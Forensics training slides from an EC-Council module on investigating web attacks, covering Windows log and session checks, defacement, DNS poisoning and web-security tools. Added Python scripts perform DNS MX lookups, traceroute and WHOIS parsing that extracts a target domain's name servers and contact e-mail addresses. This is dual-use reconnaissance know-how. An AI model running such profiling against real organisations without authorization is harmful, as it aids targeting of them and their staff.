- 43. EC-Council
Investigating Web Attacks in Windows-based Servers
Look for a large number of failed logon attempts or locked out accounts
Run Event Viewer to look at the logs:
• C:\> eventvwr.msc
Check if the following suspicious events have occurred:
• Event log service stops
• Windows File Protection is not active on the system
• The MS Telnet Service started successfully
- 44. EC-Council
Investigating Web Attacks in Windows-Based Servers (cont'd)
• C:\> net view 127.0.0.1
Look at file shares and ensure that each of them has a defined business purpose
• C:\> net session
Look at who has an open session with the system
• C:\> net use
Look at which sessions the machine has opened with other systems
• C:\> nbtstat -S
Look at NetBIOS over TCP/IP activity
• C:\> netstat -na
Look for unusual listening TCP and UDP ports
- 45. EC-Council
Investigating Web Attacks in Windows-based Servers (cont'd)
• C:\> at
Look for unusual scheduled tasks on the local host, such as tasks running as a user in the Administrators group or as SYSTEM
• C:\> lusrmgr.msc
Look for new accounts in the Administrators group
Look for unexpected processes by running Task Manager
• C:\> net start
Look for unusual network services
• C:\> dir
Check file space usage to look for a sudden decrease in free space
- 46. EC-Council
Web Page Defacement
Unauthorized modification of a web page leads to web page defacement
Attacking techniques:
• The attacker convinces the legitimate user to perform an action (i.e., giving away credentials) that may help in the attack
• Luring the legitimate user (insider) and gaining credentials
• Exploiting implementation and design errors
- 47. EC-Council
Web Page Defacement (cont'd)
Web page defacement requires write access privileges in the web server root directory
The compromise could come from any security vulnerability, such as Unicode and RPC
Web page defacements are the result of:
• Weak administrator password
• Application misconfiguration
• Server misconfigurations
• Accidental permission assignments
- 48. EC-Council
Defacement Using DNS Compromise
The attacker can compromise the authoritative domain name server for the web server, redirecting DNS requests for the website to his defaced website
• Web server DNS entry
• www.example.com 192.2.3.4
• Compromised DNS entry by the attacker
• www.example.com 10.0.0.3
• Now all requests for www.example.com will be redirected to 10.0.0.3
- 49. EC-Council
Investigating DNS Poisoning
If you notice that the DNS cache has been corrupted, dump the contents of the DNS server's cache to look for inappropriate entries
On Linux systems, use the BIND command:
• # ndc dumpdb
• Database dump initiated
You can enable DNS logging in named.conf, but it will slow down the performance of the DNS server
- 50. EC-Council
Intrusion Detection
Intrusion Detection is the art of detecting inappropriate, incorrect, or anomalous activity
It can be used to determine whether a computer network or server has experienced an unauthorized intrusion
Types of Intrusion Detection:
• Host-based Intrusion Detection Systems (HIDS): IDS systems that operate on a host to detect malicious activity on that host
• Network-based Intrusion Detection Systems (NIDS): IDS systems that operate on network data flows
• Intrusion Prevention System (IPS): a system that actively monitors a network or host for attacks and prevents those attacks from occurring
- 51. EC-Council
Strategies for Securing Web Applications
Strategies for securing web applications:
• Driving ideas for the detection of vulnerabilities
• Fixing previously found vulnerabilities
• Pen-testing the application, which saves the time otherwise spent researching vulnerabilities and analyzing results
• Checking for security flaws through IDS and IPS tools
• Improving awareness of good security
- 52. EC-Council
Investigating Static and Dynamic IP Addresses
The static IP address of a particular host can be found with the help of tools such as NSlookup, Whois, Traceroute, ARIN, and NeoTrace
The DHCP server allocates dynamic IP addresses to the hosts on a network
The DHCP log file stores information about the IP address allocated to a particular host at a particular time
- 53. EC-Council
Checklist for Web Security
Avoid user accounts with weak or no passwords
Block unused open ports
Check for the various web attacks
Test whether the Unicode vulnerability is present
Check whether an IDS or IPS is deployed
Look for possible intrusion points using a vulnerability scanner
Test whether the website can handle large loads, and SSL if it is an e-commerce website
Document the list of techniques, devices, policies, or necessary steps that provide security
- 55. EC-Council
Statistics 2005-2007 (cont’d)
- 57. EC-Council
Dotdefender
http://www.applicure.com/
Dotdefender is a web application attack protection tool that blocks attacks manifested within the HTTP request logic, such as:
• SQL Injection - dotDefender intercepts and blocks attempts to inject SQL statements that corrupt or gain access to corporate data
• Proxy Takeover - dotDefender intercepts and blocks attempts to divert traffic to an unauthorized site
• Cross-site Scripting - dotDefender intercepts and blocks attempts to inject malicious scripts that hijack the machines of subsequent site visitors
• Header Tampering - dotDefender identifies and blocks requests containing corrupted header data
• Path Traversal - dotDefender blocks attempts to navigate through the host's internal file system
• Probes - dotDefender detects and blocks attempts to ferret out the system's information
• Known Attacks - dotDefender recognizes and blocks attacks bearing known signatures
- 59. EC-Council
AccessDiver
http://www.accessdiver.com
- 61. EC-Council
Log Analyzer: Server Log Analysis
http://www.w3.org/
Server log analysis analyzes server logs by changing numeric Internet node numbers into domain names with the help of httpd-analyse.c
httpd-analyse.c is the program that helps the server log analysis tool perform its function
Output:
• A version of the log file with the document names simplified (if necessary)
• IP addresses turned into DNS name form
- 62. EC-Council
Web Attack Investigation Tools
Analog is a program which analyzes logfiles from WWW servers and can be installed directly on a virtual server
Deep Log Analyzer is an advanced web analytics solution for small and medium size websites
- 63. EC-Council
Web Attack Investigation Tools (cont'd)
AWStats is a free web analysis tool that works as a CGI script on the web server or from the command line and graphically generates advanced web, streaming, FTP, or mail server statistics
WebLog Expert is an access log analyzer which gives information about the site's visitors, such as activity statistics, accessed files, paths through the site, and browsers
- 64. EC-Council
Web Attack Investigation Tools (cont'd)
AlterWind Log Analyzer Professional is unique web log analysis software
Webalizer is a web server log file analysis program that produces usage statistics in HTML format for viewing with a browser
- 65. EC-Council
Web Attack Investigation Tools (cont'd)
eWebLog Analyzer is a web server log analyzer that gives you vital information about your website's usage; it can read the log files of the most popular web servers, including Microsoft IIS, Apache, and NCSA
N-Stealth 5 is a web vulnerability scanner that scans for over 18000 HTTP security issues; the stealth HTTP scanner writes scan results to an easy HTML report
- 66. EC-Council
Web Attack Investigation Tools (cont'd)
Acunetix scans a website simulating numerous hacking techniques, such as SQL injection, cross-site scripting, and Google hacking, in order to identify vulnerabilities in the website
Falcove is used by website owners to see whether their websites are hackable or vulnerable to attacks, and to find vulnerabilities before attackers do
Its security audit report shows the severity of the web vulnerabilities found
- 67. EC-Council
Web Attack Investigation Tools (cont'd)
AppScan provides security testing throughout the application development lifecycle, which tests security assurance in the development stage
Watchfire AppScan automates web application security audits to ensure the security and compliance of websites
- 68. EC-Council
Web Attack Investigation Tools (cont'd)
Emsa Web Monitor is a small web monitoring program that runs on the desktop and allows the user to monitor the uptime status of several websites
WebWatchBot is monitoring and analysis software for websites and IP devices, including Ping, HTTP, HTTPS, SMTP, POP3, FTP, Port, and DNS checks
- 69. EC-Council
Web Attack Investigation Tools (cont'd)
Paros is a Java-based web application security assessment tool that is used to intercept and modify all HTTP and HTTPS data between the server and the client, including cookies and form fields
HP WebInspect performs web application security testing and assessment for web applications
- 70.
Web Attack Investigation Tools
(cont’d)
KeepNI keeps an eye on the website's functionality and checks that your site
is up and fully functional at all times
Wikto checks for flaws in web servers and also offers web-based vulnerability
scanning
- 71.
Web Attack Investigation Tools
(cont’d)
Mapper maps the files, file parameters, and values of any site you wish to
test: you browse the site as a normal user while recording the session with
the Achilles proxy (other proxies are supported as well), then run Mapper on
the resulting log file
N-Stalker is a web application security scanner that offers a complete suite
of web security assessment checks to improve the overall security of web
applications against vulnerabilities and attacks
- 72.
Web Attack Investigation Tools
(cont’d)
Scrawlr is an HP tool that crawls a website and audits it for SQL injection
vulnerabilities
Exploit-Me is a suite of web application security testing tools that
integrates directly with Firefox and tests for web application
vulnerabilities from within the browser
- 73.
Web Attack Investigation Tools
(cont’d)
WebAgain protects a website and automatically restores content damaged by
attackers
UV Uptime Website Defacement Detector detects defacement of a website
- 74.
Tools for Locating IP Address
- 75.
Tools for Locating IP Address
Hide Real IP is a tool that hides the user's IP address for anonymous
Internet access; a substitute IP address appears in place of the real one
whatismyip is a web tool that reveals the public Internet IP address a
connection is actually coming from
- 76.
Tools for Locating IP Address
(cont’d)
IP Detective Suite is an IP monitoring program that reports a changing IP
address to the user's FTP site or to an e-mail address
Enterprise IP-Address Manager is an application for assigning, cataloging,
and maintaining IP addresses and host data for both registered and private
TCP/IP-addressed networks
- 77.
Tools for Locating IP Address
(cont’d)
Whois Lookup is an online tool for obtaining registration information about
any website
SmartWhois is a network information utility that looks up all the available
information about an IP address, hostname, or domain
- 78.
Tools for Locating IP Address
(cont’d)
ActiveWhois is a network tool that finds any available information about an
IP address or Internet domain
LanWhois is a program that helps you find out who registered the domain or
site you are interested in, where, and when
- 79.
Nslookup
Nslookup is a program to query Internet domain name servers. It displays
information that can be used to diagnose Domain Name System (DNS)
infrastructure
It helps find additional IP addresses once the authoritative DNS server is
known from whois: querying that server directly bypasses any caching resolver
The MX record reveals the hostname of the mail server; resolving that hostname
(an A record query) gives the mail server's IP address
Both Unix and Windows ship with an nslookup client
Third-party clients are also available, e.g. Sam Spade
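The same queries can be made without nslookup at all, which is useful on a forensic workstation where the stock tool is unavailable or its output is hard to script. The following Python script is an added example written for this edit and is not part of the EC-Council module: it builds a DNS MX query in wire format, sends it over UDP, parses the reply (including compressed names), and then resolves the lowest-preference exchanger to its A records. The resolver address (8.8.8.8) and the fallback domain are choices made for this example; set `server` to the authoritative name server learned from whois to query it directly, as the slide suggests.

```python
import random
import socket
import struct

# Resolver chosen for this example; point it at the authoritative server
# learned from whois to bypass caching resolvers entirely.
DEFAULT_SERVER = "8.8.8.8"
QTYPE = {"A": 1, "NS": 2, "MX": 15}


def encode_name(name):
    """Encode a domain name as DNS wire-format labels."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qtype, txid=None):
    """Build a standard query (RD=1) for one name/type; return (txid, bytes)."""
    txid = random.randrange(0, 65536) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE[qtype], 1)
    return txid, header + question


def decode_name(msg, offset):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels = []
    end = None
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                  # compression pointer
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if end is None:
                end = offset + 2                   # resume after first pointer
            offset = pointer
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (offset if end is None else end)


def parse_response(msg, expected_txid):
    """Return the answer section as (name, type, ttl, rdata) tuples."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid:
        raise ValueError("transaction id mismatch (spoofed or stale reply?)")
    if flags & 0x000F:
        raise ValueError("server returned RCODE %d" % (flags & 0x000F))
    offset = 12
    for _ in range(qd):                            # skip echoed question(s)
        _, offset = decode_name(msg, offset)
        offset += 4
    answers = []
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlen]
        if rtype == QTYPE["MX"]:                   # preference + exchanger name
            pref = struct.unpack("!H", rdata[:2])[0]
            exchange, _ = decode_name(msg, offset + 2)
            rdata = (pref, exchange)
        elif rtype == QTYPE["A"]:
            rdata = socket.inet_ntoa(rdata)
        elif rtype == QTYPE["NS"]:
            rdata, _ = decode_name(msg, offset)
        offset += rdlen
        answers.append((name, rtype, ttl, rdata))
    return answers


def best_exchanger(answers):
    """Lowest-preference MX host from parsed answers, or None."""
    mx = sorted(r[3] for r in answers if r[1] == QTYPE["MX"])
    return mx[0][1] if mx else None


def dns_lookup(name, qtype="MX", server=DEFAULT_SERVER, timeout=3.0):
    """Send one UDP query and parse the reply (network access required)."""
    txid, packet = build_query(name, qtype)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(packet, (server, 53))
        reply, _ = sock.recvfrom(4096)
    return parse_response(reply, txid)


def mail_server_ips(name, server=DEFAULT_SERVER):
    """Primary MX host for a domain and the IPv4 addresses it resolves to."""
    host = best_exchanger(dns_lookup(name, "MX", server))
    if host is None:
        return None, []
    ips = [r[3] for r in dns_lookup(host, "A", server) if r[1] == QTYPE["A"]]
    return host, ips


if __name__ == "__main__":
    import sys
    print(mail_server_ips(sys.argv[1] if len(sys.argv) > 1 else "example.com"))
```

Run it as `python dnsmx.py targetdomain.example` (script name is a placeholder). The transaction-ID check matters during an investigation: a reply with the wrong ID is either stale or injected, and a tool that silently accepts it is exactly what DNS poisoning attacks rely on.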
- 81.
Traceroute
http://www.traceroute.org/
Traceroute works by exploiting a feature of the Internet Protocol called TTL,
or Time To Live
It reveals the path IP packets travel between two systems by sending out
consecutive UDP packets with ever-increasing TTLs (1, 2, 3, ...)
As each router forwards an IP packet, it decrements the TTL. When the TTL
reaches zero, the router discards the packet and sends an ICMP "TTL exceeded"
message back to the originator; the source address of that message identifies
the router at that hop
The final hop is recognised differently: the destination host answers the
probe with an ICMP "port unreachable" message, because the probes are aimed at
a UDP port nothing is listening on. Windows tracert sends ICMP echo requests
instead of UDP probes, so the end of the path is an echo reply
Routers with reverse DNS entries reveal the router's name, and often its
network affiliation and geographic location
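The following Python script is an added example written for this edit, not code from the slides or from any traceroute implementation; it carries out exactly the mechanism described above. Each probe is a UDP datagram with the TTL set through the `IP_TTL` socket option, and the ICMP replies are read from a raw socket, which requires root. The port range starting at 33434 is the classic traceroute convention, `SAMPLE_TTL_EXCEEDED` is a packet constructed by hand for this example (router 10.0.0.1 discarding the second probe), and the addresses in it are private or documentation ranges.

```python
import socket
import struct
import time

ICMP_TIME_EXCEEDED = 11
ICMP_DEST_UNREACH = 3
PORT_UNREACHABLE = 3
BASE_PORT = 33434          # classic traceroute probe ports: 33434 + hop - 1

# Constructed for this example: the raw IPv4 datagram a raw ICMP socket
# hands us when router 10.0.0.1 discards our second probe (TTL 2).
SAMPLE_TTL_EXCEEDED = (
    b"\x45\x00\x00\x38\x00\x00\x00\x00\x40\x01\x00\x00"      # outer IP header
    b"\x0a\x00\x00\x01"                                      # src 10.0.0.1 (router)
    b"\xc0\xa8\x01\x0a"                                      # dst 192.168.1.10 (us)
    b"\x0b\x00\x00\x00\x00\x00\x00\x00"                      # ICMP type 11, code 0
    b"\x45\x00\x00\x1c\x00\x00\x00\x00\x02\x11\x00\x00"      # our original IP header
    b"\xc0\xa8\x01\x0a\xc0\x00\x02\x01"                      # 192.168.1.10 -> 192.0.2.1
    b"\xd4\x31\x82\x9b\x00\x08\x00\x00"                      # UDP: dst port 33435
)


def probe_port(ttl):
    """Destination UDP port used for the probe with this TTL."""
    return BASE_PORT + ttl - 1


def parse_icmp(packet):
    """Return (type, code, router_ip, probed_port) from a raw IPv4 datagram.

    ICMP errors carry the header of the packet that triggered them plus the
    first 8 bytes of its payload, i.e. our UDP header; that is how a reply
    is matched to the probe it belongs to.
    """
    ihl = (packet[0] & 0x0F) * 4
    src = socket.inet_ntoa(packet[12:16])
    icmp_type, icmp_code = packet[ihl], packet[ihl + 1]
    if icmp_type not in (ICMP_TIME_EXCEEDED, ICMP_DEST_UNREACH):
        return icmp_type, icmp_code, src, None     # nothing embedded to match
    inner = ihl + 8                                # ICMP header is 8 bytes
    udp = inner + (packet[inner] & 0x0F) * 4
    dst_port = struct.unpack("!H", packet[udp + 2:udp + 4])[0]
    return icmp_type, icmp_code, src, dst_port


def hop_status(icmp_type, icmp_code):
    """Intermediate router, the destination itself, or something unrelated."""
    if icmp_type == ICMP_TIME_EXCEEDED:
        return "router"
    if icmp_type == ICMP_DEST_UNREACH and icmp_code == PORT_UNREACHABLE:
        return "destination"
    return "other"


def resolve_name(ip):
    """Reverse-DNS the router; unnamed routers are reported by address only."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return ip


def traceroute(dest, max_hops=30, timeout=2.0):
    """UDP probes with TTL 1, 2, 3, ...; needs root for the raw ICMP socket."""
    dest_ip = socket.gethostbyname(dest)
    recv = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    hops = []
    for ttl in range(1, max_hops + 1):
        send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        send.setsockopt(socket.IPPROTO_IP, socket.IP_TTL, ttl)
        started = time.time()
        send.sendto(b"", (dest_ip, probe_port(ttl)))
        status = "timeout"
        hop = (ttl, None, "*", None, status)
        deadline = started + timeout
        while time.time() < deadline:
            recv.settimeout(max(deadline - time.time(), 0.01))
            try:
                packet, _ = recv.recvfrom(1024)
            except socket.timeout:
                break
            icmp_type, icmp_code, src, port = parse_icmp(packet)
            if port != probe_port(ttl):
                continue                           # ICMP for other traffic
            status = hop_status(icmp_type, icmp_code)
            rtt = round((time.time() - started) * 1000, 1)
            hop = (ttl, src, resolve_name(src), rtt, status)
            break
        send.close()
        hops.append(hop)
        if status == "destination":
            break
    recv.close()
    return hops


if __name__ == "__main__":
    import sys
    for hop in traceroute(sys.argv[1] if len(sys.argv) > 1 else "example.com"):
        print(*hop)
```

Matching replies on the embedded destination port is what keeps unrelated ICMP traffic arriving on the raw socket from being mistaken for a hop; a hop that stays at `*` after the timeout is a router that rate-limits or suppresses ICMP, not necessarily a break in the path.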
- 82.
Tools for Locating IP Address:
NeoTrace (Now McAfee Visual Trace)
NeoTrace shows the traceroute output visually: map view, node view, and IP view
- 83.
Whois
http://www.whois.net/
Whois is the client utility that communicates with WHOIS servers located
around the world to obtain information about domain registration
It also supports IP address queries and automatically selects the
appropriate WHOIS server for the address block being queried
- 84.
Whois
Registrant:
targetcompany (targetcompany-DOM)
# Street Address
City, Province
State, Pin, Country
Domain Name: targetcompany.COM
Domain servers in listed order:
NS1.WEBHOST.COM XXX.XXX.XXX.XXX
NS2.WEBHOST.COM XXX.XXX.XXX.XXX
Administrative Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
Technical Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
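The record above is the kind of free-form text a WHOIS server returns. The following Python script is an added example written for this edit, not part of the EC-Council module: it speaks the WHOIS protocol itself (a single query line over TCP port 43, as specified in RFC 3912), follows the referral from IANA's server to the registry responsible for the TLD, and parses a record laid out like the template above into name servers, contacts, and e-mail addresses. The IANA server name is real; `SAMPLE_RECORD` is the slide's template filled with documentation addresses (192.0.2.0/24) so the parser can be exercised offline, and the field names the parser produces are choices made here.

```python
import re
import socket

WHOIS_PORT = 43                       # RFC 3912: one query line, free-form reply
IANA_WHOIS = "whois.iana.org"         # refers you to the registry for any TLD

# Constructed for this example: the slide's template filled with documentation
# addresses (RFC 5737) so the parser can be exercised offline.
SAMPLE_RECORD = """\
Registrant:
targetcompany (targetcompany-DOM)
# Street Address
City, Province
State, Pin, Country
Domain Name: targetcompany.COM
Domain servers in listed order:
NS1.WEBHOST.COM 192.0.2.10
NS2.WEBHOST.COM 192.0.2.11
Administrative Contact:
Surname, Name (SNIDNo-ORG) targetcompany@domain.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
Technical Contact:
Surname, Name (SNIDNo-ORG) hostmaster@webhost.com
targetcompany (targetcompany-DOM) # Street Address
City, Province, State, Pin, Country
Telephone: XXXXX Fax XXXXX
"""


def whois_query(server, query, timeout=10.0):
    """Send one WHOIS query over TCP/43 and return the server's full reply."""
    with socket.create_connection((server, WHOIS_PORT), timeout=timeout) as sock:
        sock.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:                       # the server closes when it is done
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def referral_server(text):
    """The 'refer:' or 'whois:' server named in an IANA-style reply, if any."""
    m = re.search(r"^(?:refer|whois):\s*(\S+)", text, re.M | re.I)
    return m.group(1).lower() if m else None


def parse_whois(text):
    """Split a record laid out like SAMPLE_RECORD into its sections."""
    record = {"domain": None, "registrant": [], "name_servers": [], "contacts": {}}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.match(r"Domain Name:\s*(\S+)", line, re.I)
        if m:
            record["domain"] = m.group(1).lower()
        elif re.match(r"Registrant:", line, re.I):
            section = "registrant"
        elif re.match(r"Domain servers", line, re.I):
            section = "name_servers"
        elif re.match(r"(Administrative|Technical) Contact:", line, re.I):
            section = line.split()[0].lower()
            record["contacts"][section] = []
        elif section == "name_servers":         # "HOST IP" pairs, IP optional
            parts = line.split(None, 1)
            record["name_servers"].append((parts[0].lower(), parts[1] if len(parts) > 1 else None))
        elif section == "registrant":
            record["registrant"].append(line)
        elif section in record["contacts"]:
            record["contacts"][section].append(line)
    record["emails"] = sorted(set(re.findall(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+", text)))
    return record


def lookup(domain):
    """Ask IANA which registry serves the TLD, then query that registry."""
    first = whois_query(IANA_WHOIS, domain)
    registry = referral_server(first)
    return parse_whois(whois_query(registry, domain) if registry else first)


if __name__ == "__main__":
    import sys
    print(lookup(sys.argv[1] if len(sys.argv) > 1 else "example.com"))
```

Registries format their records differently, so `parse_whois` should be treated as a starting point to adapt to the registry that actually answers; the name servers it extracts are the input to the nslookup step earlier in this module, and the e-mail addresses are leads for the contact step of an investigation.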
- 85.
CountryWhois
http://www.tamos.com/
CountryWhois is a utility for identifying the geographic location of an
IP address
It is similar to SmartWhois, but the focus is on IP-to-country identification
Uses:
• Analyzing server logs
• Checking e-mail headers
• Identifying online credit card fraud
- 87.
IP2country
http://www.ip2country.org/
IP2country identifies a visitor's geographical location, i.e. country,
region, city, and ISP, using a proprietary IP address lookup database
Features:
• Real-time IP geolocation detection
• Redirects web pages based on geographical region
• Fraud detection (credit card fraud etc.)
• Web log statistics and analysis
• Spam filtering
- 89.
CallerIP
http://www.callerippro.com/
CallerIP shows the user when someone has connected to their computer and
reports the remote IP address
It also runs a trace on that IP address
Features:
• Real-time connection monitoring
• Identifies the country of origin for all connections made to your machine
• Provides worldwide WHOIS reports for any monitored connection
- 91.
http://www.whois.net/
Whois.net is an online tool for gaining information about any site
- 92.
Pandora FMS
http://pandorafms.org/
Pandora FMS is open-source monitoring software
Features:
• Watches your systems and applications
• Lets you know the status of any element of those systems
Pandora FMS detects:
• Defacement of the website
• A network interface going down
• A memory leak in a server application
- 94.
CounterStorm-1: Defense Against
Known, Zero Day, and Targeted Attacks
The CounterStorm-1 suite of network security appliances is marketed by its
vendor as a defense against known, zero-day, and targeted attacks
It is claimed to neutralize attacks automatically within seconds, limiting
costly and widespread damage
It does not rely on signatures: CounterStorm-1 detects attacks in all IP
traffic (TCP, UDP, and ICMP) by behavioral means
It recognizes current attacks and automatically adjusts to future threats
http://www.counterstorm.com
- 95.
Summary
Cross-site scripting (XSS, historically also abbreviated CSS) is an application-layer
attack technique
SQL injection means passing SQL code that the developer never wrote into an
application so that its database executes it
Cookie poisoning is the process of tampering with the values stored in cookies
The source, nature, and time of an attack can be determined by analyzing the log
files of the compromised system
FTP server vulnerabilities allow an attacker to directly compromise the system
hosting the FTP server
Web page defacement requires write access to the web server's document root
Intrusion detection is the art of detecting inappropriate, incorrect, or
anomalous activity